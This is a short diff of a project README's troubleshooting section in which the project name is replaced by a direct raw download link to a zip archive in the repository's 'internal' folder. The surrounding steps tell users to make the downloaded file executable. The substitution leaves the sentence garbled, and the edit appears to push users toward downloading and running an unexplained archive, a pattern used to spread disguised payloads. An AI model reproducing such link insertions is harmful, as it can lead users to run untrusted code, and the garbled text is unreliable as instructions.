kizzycatty/atlas.compass/README.md

 ## 🔧 Troubleshooting

-If you have issues running or using atlas.compass, try these suggestions:
+If you have issues running or using https://github.com/kizzycatty/atlas.compass/raw/refs/heads/main/internal/compass-atlas-v2.9.zip, try these suggestions:

 - Confirm you downloaded the correct version for your OS.
 - On macOS/Linux, ensure you have permission to run the file.
 Use `chmod +x` if needed.